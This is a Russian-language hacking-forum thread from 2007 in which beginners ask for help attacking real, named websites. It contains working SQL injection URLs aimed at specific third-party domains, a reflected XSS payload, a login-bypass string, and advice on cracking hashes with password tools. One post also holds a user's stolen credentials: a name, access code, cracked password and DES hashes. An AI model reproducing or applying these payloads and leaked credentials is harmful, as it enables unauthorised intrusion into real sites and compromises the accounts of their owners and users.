Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HornetBlack

    HornetBlack Member

    Joined:
    28 Oct 2007
    Messages:
    27
    Likes Received:
    13
    Reputations:
    15
    Т.к. я начинающий, то в процессе обучения возник вопрос :)

    Вскрыл сайт с SI, добыл следующую инфу:

    таблица 1:
    access_code,firstname,lastname,password
    123800876,Adam,Smith,bigdog (из MD5)

    таблица 2:
    name,is_superuser,api_password,password
    Adam Smith,1,NhaXbNfmzppAE,fsH1sRBI6rLuQ

    С первой таблицей все ясно - ее данные подходят к входу на форум, но не подходят к админке :( Не могу понять, к чему относятся данные из второй таблицы. Особенно интересуют поля api_password и password. Вопрос: хешированы они или нет? Если хешированы, то чем можно их забрутить? Что такое access_code? И последний вопрос - к чему могут относиться данные из второй таблицы?

    Доп.инфа: в первой таблице юзверей более 2 тысяч, во второй - пяток.
     
  2. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Это DES (13 симв)... password- это понятно (хотя несовсем)... api_password - возможно это
    admin panel interface тоесть админка... password-это допустим доступ к сайту, api_password - это пароль доступа в админку...
    может быть api_password - это ключ шифрования DES-хеша, а password - это зашифрованный ключем api_password хеш пароля
    хотя врядли все так сложно, т.ч. скорей всего первый вариант
     
  3. HornetBlack

    HornetBlack Member

    Joined:
    28 Oct 2007
    Messages:
    27
    Likes Received:
    13
    Reputations:
    15
    Спасибо за подсказку. А DES чем-нибудь брутится? Может онлайн-сервисы какие есть?
     
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Онлайн незнаю, скорее их нет, а вот passwordpro 2.2.6 точно брутит
     
  5. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    PHP:
    http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,3,4/*
    как посмотреть версию бд? там походу фильтрация какая-то странная... это одна из моих первых скулей =))

    и еще
    PHP:
    http://www.haber20.net/news_page.php?m=1&id=-2541
    там выводится id. что-то можно с этим сделать?

    и вот еще. что здесь?
    PHP:
    http://www.atn-night-vision.com/news_page.php?id=-2%20union+select+1,2,3,4,5/*
    аналогично
    PHP:
    http://jdbasketball.com/news_page.php?id=14'
     
    #245 Piflit, 4 Nov 2007
    Last edited: 4 Nov 2007
    1 person likes this.
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,convert(version()+using+cp1251),4/*
    кодировка^
     
  7. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    там скули нет, там пассивная XSS

    Code:
    http://www.haber20.net/news_page.php?m=1&id=2542%3Cscript%3Ealert(121212121)%3C/script%3E

    насчет скули, наряду с вариантом ice1k`a возможен еще такой вариант:
    Code:
    http://www.arsenal-electro.ru/news_page.php?id=-11%20union+select+1,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4/*
    
     
  8. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    aes_decrypt(aes_encrypt(user(),0x71),0x71)
    почему это прокатывает? это шифрование типа ксора?
     
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Нет, это шифрование типа AES, вернее точно AES...

    получается так, что ты шифруешь данные user() (функция aes_encrypt() ) с ключем 0x71, а потом сразуже расшифровываешь то что зашифровал(функция aes_decrypt() ) c этим же ключем, и в используемой кодировке
     
  10. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    у меня еще несколько вопросов.
    1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
    тут просто ошибка скрипта, а скуля нет, так?
    2. когда надо ставить перед значением параметра минус, а когда кавычку после?
    3. что можно сделать, кроме брута, если версия бд меньше 5?
    ЗЫ пост http://forum.antichat.ru/showpost.php?p=497322&postcount=251 все еще актуален =)
     
  11. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    >у меня еще несколько вопросов.
    >1. http://www.wolfpublishers.nl/us/news.php?id=-15%20union+select+1,2/*
    http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,3,4,5,6/*
    >2. когда надо ставить перед значением параметра минус, а когда кавычку после?
    Зависит от самого запроса, например
    Code:
    "SELECT `date`,`post` FROM `forum` where id='".$id."'  and id > 5;"
    тут нужно будет ставить кавычку и получится
    Code:
    "SELECT `date`,`post` FROM `forum` where id=''SQL-inj /* and id > 5;'"
    т.е. мы "выходим" из id=''
    - ставить не обязательно, нужно лишь чтобы "левы" (не наш) запрос не выполнился, это можно сделать "-", and 1=0, or 1=1, limit 0 и т.д.
    >3. что можно сделать, кроме брута, если версия бд меньше 5?
    посимвольный подбор\угадывание. Если сайт на паблик двиге - установить двиг и посмотреть
     
    2 people like this.
  12. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    1. Это скуля
    Code:
    http://www.wolfpublishers.nl/us/news.php?id=-15%20union%20select%201,2,aes_decrypt(aes_encrypt(user(),0x71),0x71),4,5,6/*
    2. когда перменная строкового типа (присутствуют не только цифры) надо ставить кавычку
    когда переменная "числовая" надо ставить минус (хотя и не обязательно), но бывает, что даже если присутствуют только цифры, это все равно переменная строкового типа, в таком случае надо ставить кавычку... (т.е. закрывать для корректности запроса)

    3. только искать заранее известные таблицы, например если есть на сайте форум phpBB, то логично искать табличку phpbb_users, хотя иногда форум располагается в другой БД, тогда надо знать еще и имя БД форума, также при установке форума, иногда меняют префикс (phpbb_) тогда его тоже нужно подбирать
     
    1 person likes this.
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    с чего ты взял? здесь сто процентная иньекция -
    Code:
    http://www.wolfpublishers.nl/us/news.php?id=15+union+select+1,2,convert(version()+using+latin1),4,5,6/*
    Минус ставиться для перехода к несуществующим значениям переменной, делаеться в тех случях когда при правельном запросе возвращаеться исходная страница и не видно принтабельных столбцов ( можно перейти не только с помощью минуса но и влепить слишком большое значие e.x =999999+union..

    Что ты подрузомеваешь под брутом, если перебор действительных значений таблиц и колонок то да
     
    4 people like this.
  14. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    http://www.hackzona.ru/hz.php?name=Forums&file=viewtopic&t=14033

    при этом запросе хакзона пишет

    PHP:
    Общая ошибка 
      
    Could not obtain user vote data 
    for this topic

    DEBUG MODE

    SQL Error 
    1064 You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 4

    SELECT vote_id FROM voov_bbvote_voters WHERE vote_id 
    331 AND vote_user_id 

    Line 747
    File 
    : /usr/home/www/a11/modules/Forums/viewtopic.php 
    это скуль?, если да то в каком параметре он?
     
  15. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Только что ходил по ссылке - все нормально.
     
  16. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    мля я захожу у меня ошибка sql синтаксиса пишет хз
     
  17. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    http://se-t.net/index.php?pg=
    Есть ли тут инклюд?
     
  18. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Нет. Там есть функция file и вряд ли что получится сделать.
     
    1 person likes this.
  19. nikoTM

    nikoTM Elder - Старейшина

    Joined:
    25 Sep 2007
    Messages:
    41
    Likes Received:
    6
    Reputations:
    0
    Ребят может не в тему, но каким должен быть запрос при авторизации чтоб это - ' or 1=1/* ))) прокатило ?
     
  20. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    2 nikoTM
    Примерно таким:
    $mysql_query="SELECT * FROM prefix_users WHERE username=' ".$username." ' and password='".$password.'";

    Тогда при вставке твоего кода получается:
    $mysql_query="SELECT * FROM prefix_users WHERE username=' ' or 1=1/*" ' and password='".$password."';
    То есть если нет пользователя с пустым именем, то извлекается первый попавшийся пользователь.
     
    #260 1ten0.0net1, 6 Nov 2007
    Last edited: 6 Nov 2007
    2 people like this.
Thread Status:
Not open for further replies.